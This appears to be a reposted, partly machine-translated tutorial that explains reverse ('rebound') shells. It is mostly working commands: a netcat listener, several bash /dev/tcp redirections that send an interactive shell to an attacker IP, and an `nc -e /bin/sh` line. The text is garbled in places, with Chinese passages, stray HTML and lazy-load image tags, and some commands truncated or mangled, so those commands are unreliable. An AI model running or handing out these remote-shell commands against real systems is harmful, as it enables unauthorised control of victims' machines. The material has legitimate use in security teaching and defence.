What does rebound shell mean?

* Solemn statement: This article is limited to technical discussion and sharing, and is strictly prohibited from being used in illegal ways.

0x00 Preface

Bounceshell means that the control end listens on a certain TCP/UDP port, and the controlled end initiates a request to the port port and transfer its command line input and output to the control port.

In layman's terms, reboundshell is a kind of reverse link, which is different from forward ssh. It executes commands on the other party's computer to connect to ours. attack mode, and this attack mode must be used with a remote command execution vulnerability.

Why reboundshell? It is usually used when the controlled end is restricted by firewall, lacks permissions, and the port is occupied.

Suppose we attack a machine and open a port on the machine. The attacker connects to the target machine on his own machine. This is a more conventional form. We call it a forward connection. Remote desktop, web service, ssh, telnet, etc. are all forward connections.

So under what circumstances is the forward connection not easy to use:

1. A client has hit your network horse, but it is in the LAN, you connect directly No.

2. Its ip will change dynamically and you cannot continuously control it.

3. Due to restrictions such as firewalls, the other machine can only send requests but cannot receive requests.

4. For viruses and Trojans, it is unknown when the victim will be infected, what the other party's network environment is like, and when to turn on and off the machine. Therefore, establish a server to allow malicious programs to actively connect. , is the best policy.

Then rebound is easy to understand. The attacker specifies the server, and the victim host actively connects to the attacker's server program, which is called reboundshell.

0x01 Rebound shell demonstration

We use bashRemote code execution vulnerability example to understand its principle

Attack end: 10.100. 40.5 Victim machine: 192.168.197.136

First we need to monitor the port on the attack end, and use this port to receive the shell
bounced by the victim machine and enter it on the attack end Commandnc -l 2333

Then execute the command

bash -i >& /dev/tcp/10.100.40.5/2333 0>&1

on the victim machine and we will We found that the shell of our victim has successfully appeared on our attack end, and we can perform the next step on the victim end on our attack end

For example:

0x02 Principle

2.1 Rebound shell command principle

(1)bash -i

bash is a common shell of linux and is the default# for many Linux distributions ##Shell.
-iThis parameter means to generate an interactive shell

(2)

./dev/tcp/ip/port
/dev/tcp|udp/ip/portThis file is very special. In fact, it can be regarded as a device (everything under Linux is a file), In fact, if you access the location of this file, it does not exist, as shown below:

(3) But if you read this file while one party is listening on the port, By writing,

socketcommunication with the server listening on the port can be realized

We output characters to the file

/dev/tcp

Victim end :

Attacking side:

(4) Next we are looking at transferring the output to the victim side. The attack end continues to listen to port

2333, and if you enter the content on the attack end and press Enter, it will appear on the victim end.

(5) This way the idea is clearer, let’s talk about interactive redirection:

In order to achieve interaction, We need to redirect the output of the victim's interactive

shell to the attack machine;

Enter on the victim machine:

bash -i > /dev/tcp 10.100.40.5/2333

Then we found that no matter what command is entered, There will be no echo, and the echo appears now that the standard output of the attack side is directed to the attack side.

这样只是回显而已，并没有办法在攻击端直接执行命令。

(6)所以我们还需要将攻击者输入的指令输入给受害者的bash：

bash -i <p>这样就会做到在攻击端输入命令，回显到受害端：</p><p><img src="/static/imghwm/default1.png" data-src="https://img.php.cn/upload/article/000/465/014/168379352319852.jpg?x-oss-process=image/resize,p_40" class="lazy" alt="What does rebound shell mean?"></p><p><img src="/static/imghwm/default1.png" data-src="https://img.php.cn/upload/article/000/465/014/168379352339852.jpg?x-oss-process=image/resize,p_40" class="lazy" alt="What does rebound shell mean?"></p><p>(7)最重要的在与怎么将两个操作结合起来，实现在攻击端输入攻击端输出，我们需要将输出输入都绑定到<code>/dev/tcp</code>这个文件下。</p><p>命令:</p><pre class="brush:php;toolbar:false">bash -i > /dev/tcp/10.100.40.5/2333 0>&1

受害端:

攻击端：

我们发现完全实现了我们的需求，在攻击端执行命令，并且回显，这个命令，做到了输入0是由/dev/tcp/192.168.146.129/2333输入的，也就是攻击机的输入，命令执行的结果1，会输出到/dev/tcp/192.168.156.129/2333上，这就形成了一个回路，实现了我们远程交互式shell的功能。
我们发现还是有一个小问题，我们可以看到，虽然命令执行结果在攻击端回显，但是受害端依然是有命令回显的，
所以我们需要解决这个问题
命令 :

bash -i > /dev/tcp/10.100.40.5/2333 0>&1 2>&1

这样命令就不会回显到受害端了。

就算是错误输出也会输出到攻击端，这样就达到了我们的目的。

2.2 常见反弹shell方法

(1) 方法一

bash -i>& /dev/tcp/10.100.40.5/2333 0& /dev/tcp/10.100.40.5/2333 0<p>这两个几乎是一样的唯一的区别是<code>0>&1</code>和<code>0，其实就是打开方式的不同，而对于这个文件描述符来讲并没有什么区别。</code></p><p>(2) 方法二</p><pre class="brush:php;toolbar:false">bash -i >& /dev/tcp/10.100.40.5/2333 & /dev/tcp/10.100.40.5/2333 0<p>(3) 方法三</p><pre class="brush:php;toolbar:false">exec 5/dev/tcp/192.168.146.129/2333;cat &5 2>&amp1;done
0/dev/tcp/attackerip/4444; sh &196 2>&196

(4) 方法四

nc -e /bin/sh 10.100.40.5 2333

The above is the detailed content of What does rebound shell mean?. For more information, please follow other related articles on the PHP Chinese website!